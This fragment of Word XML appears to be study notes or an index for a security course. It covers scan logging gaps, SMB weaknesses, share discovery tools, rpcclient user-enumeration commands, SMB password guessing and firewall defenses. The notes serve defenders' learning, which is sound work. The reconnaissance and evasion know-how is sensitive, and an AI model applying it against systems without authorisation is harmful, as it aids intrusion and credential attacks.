                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Finding in backup files and install scripts on web servers can lead to easy access to external systems.</w:t>
            </w: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4B71E7C7" w14:textId="757DEC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r w:rsidR="00F905DA">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 76</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65FC02AE" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00235885" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Most targets will not log half-open SYN scan(Nmap, Masscan)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6737E150" w14:textId="77777777" w:rsidR="00235885" w:rsidRDefault="00235885" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Many web servers will not log TLS-Scan access (since it lacks an HTTP request)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7A9637" w14:textId="77777777" w:rsidR="00235885" w:rsidRDefault="00235885" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>As defenders we’re interested in what happens after scanning.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B354C4E" w14:textId="77777777" w:rsidR="00235885" w:rsidRDefault="00235885" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Web server logs reveal site crawling.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66027855" w14:textId="77777777" w:rsidR="00235885" w:rsidRDefault="00235885" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Malformed requests or paramenters sent toserver-side code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4090258B" w14:textId="045657AC" w:rsidR="0027605D" w:rsidRPr="006F5A04" w:rsidRDefault="0027605D" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>In many cases, cloudvsystems do not need to be accessible by the entire intenet. Limit access to WAFs, API consumers, and other required servers. Ask who needs to connect to this server and apply firewall rules to restrict access.</w:t>
            </w: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2664A6" w:rsidRPr="006F5A04" w14:paraId="4748BC04" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A7180D0" w14:textId="063E5FB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21EA5D20"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SMB is an application layer that implements file and printer sharing, authentication, remote admin, and other features.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37035B35"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 xml:space="preserve">Why is SMB such a problem for modern networks? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16CEDE24"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Configuration is often done by end-users (creating shares, choosing files to place on shares, defining security for file access controls)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192CD569"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It is complex and has lots of legacy functionality to support.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6803D7D0"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Lots of non-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> devices use SMB with minimal implementations that don’t support modern security features (printers, EKG machines)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F67B846" w14:textId="767B2904" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB is heavily used by attackers, often appearing as “normal” TCP/445 traffic, IT is an essential protocol to understand for defenders. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79155A6D" w14:textId="7CE79A3E"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5C153CE0"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82</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="28836FD6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C61CE81" w14:textId="1DAC409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5F3BF7AA" w14:textId="4DE7B77D" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Many organizations continue to use old versions of SMB unnecessarily. This creates an opportunity for attackers to eavesdrop on SMB activity to attack credentials, and to exploit vulnerable SMB implementations. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A991591" w14:textId="6E74995D"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67AEFE66"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83</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="6373178B" w14:textId="77777777" w:rsidTr="006B2DF5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="55662F98" w14:textId="3FC32F5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3DFB1463" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Get-WmiObject (WMI)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6449EB43"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 xml:space="preserve"> net.exe (Windows a non-Windows)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C3CC5AA" w14:textId="02D34641" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>an SMB share is a resource where files can be read or written to or from an SMB server. SMB shares are often provisioned by an administrator as a collection of files for a specific department (accountingfiles) or a specific activity (timesheets) or even generic terms to give users the flexibility to decide how they want to store or access files(companydata).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5277F6BB" w14:textId="34E63783"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4ECD7F8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84</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="5FA29C6C" w14:textId="77777777" w:rsidTr="006B2DF5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="515B0BA8" w14:textId="56133C86"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Searching for SMB Shares: SMBeagle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CDB15E8" w14:textId="647E213F" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SMBeagle</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> identifies SMB servers and shares, then enumerates files, but doesn’t help you assess data disclosed in the files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BE43201" w14:textId="6973D045"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62E6772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85</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="10996335" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C57BB97" w14:textId="6C3DD063"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4CC48053" w14:textId="63D01F98" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Copernic Desktop search indexes file name and content for local files or SMB shares. After building the index, you can quickly search for sensitive strings. Useful for defenders to audit server file shares.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297BBC5B" w14:textId="671DC606"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295C367A"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86</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="44483150" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="677F98A8" w14:textId="678B266A"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25104BE9" w14:textId="604DA685" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smbclient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D3CEC2D" w14:textId="1EAC68A5"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7E286319"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87</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="265FEA67" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20989DD6" w14:textId="2685152A"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Using Samba's rpcclient from Linux for More Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707C1608"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Rpcclient</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6366172E"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Originally created as a troubleshooting and debugging tool for the Samba suite, rpcclient is very flexible and includes hundreds of features.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E943DAA"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Enumdousers: List users.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="780E898E"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Enumalsgroup domain|builtin: List groups (enum alias group)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C014E1"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Isaenumsid: show all users SIDs defined on the box</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43EDE52A"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Loopupnames name: Show SID associated with user or group name.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187D458A"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lastRenderedPageBreak/>
              <w:t>Lookupsids sid: Show username associated with SID</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19EBD111" w14:textId="18E18B56" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Srvingo: Shows OS type and version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06C0471B" w14:textId="059D3548" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A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197486B1" w14:textId="725543D3"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88</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="4898D1F6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48B02A70" w14:textId="4AC48C6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62166BE9" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SMB is a complex protocol that has been around for a long time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1136A762" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Organizations mitigate SMB flaws with regular patching</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C016FE" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Many organizations have SMB servers that don’t get patched regularly.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2958ED4B" w14:textId="7C3EF78B" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attackers exploit these systems first, then pivot to other targets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53943195" w14:textId="4FE54A11"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7033817A"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89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="64C94331" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BBA029" w14:textId="7759FD5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1DFC1DE9" w14:textId="525813BF" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Even without a specific, unpatched SMB vulnerability, attackers can exploit SMB to gain unauthorized access to files or even the ability to run commands on remote system. Windows SMB implementations do not implement a back-off delay for password guessing making it possible for an attacker to quickly guess passwords until they find a valid username and password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C144564" w14:textId="7EFEF810"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316BCFB9"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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="7BB35EC4" w14:textId="77777777" w:rsidTr="006B2DF5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="182388DE" w14:textId="52564BB7"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53A39115"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Get-SmbSession  Net use</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26466CDD" w14:textId="4501B828" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shows inbound SMB connections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76CB274F" w14:textId="78EA1608"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381C822D"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91</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="293D753C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2B478D6D" w14:textId="71AE3226" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SMB PowerShell commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73094AC3" w14:textId="42C6E2D3" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46861593" w14:textId="76F0283C" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20F67043" w14:textId="3A37E964" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="5C79FB3B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="35C74FCC" w14:textId="68804212"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8102B4"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Block access to TCP/445,135,137,139 UDP/445,137,138</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025186CA"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Alternative: explicitly permit these ports only from systems or networks that require SMB access to a specified destination such as file servers and domain controllers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CACAD3B"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Private VLANs are useful to limit inter-workstations access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A4D0626" w14:textId="577E6C9A" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Check for access to the ports listed above in logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F1ACC2" w14:textId="6B051B6A"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2DF87251"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93</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="5A06242A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EA7E0F2" w14:textId="372BB8F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2664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AEB0ADA" w14:textId="38D0CB99"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7AF96B7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94</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="2DD3075E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25577371" w14:textId="2AF1FEE6"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Defense Spotlight: DeepBlueCLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F482B4" w14:textId="6362F4AA" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
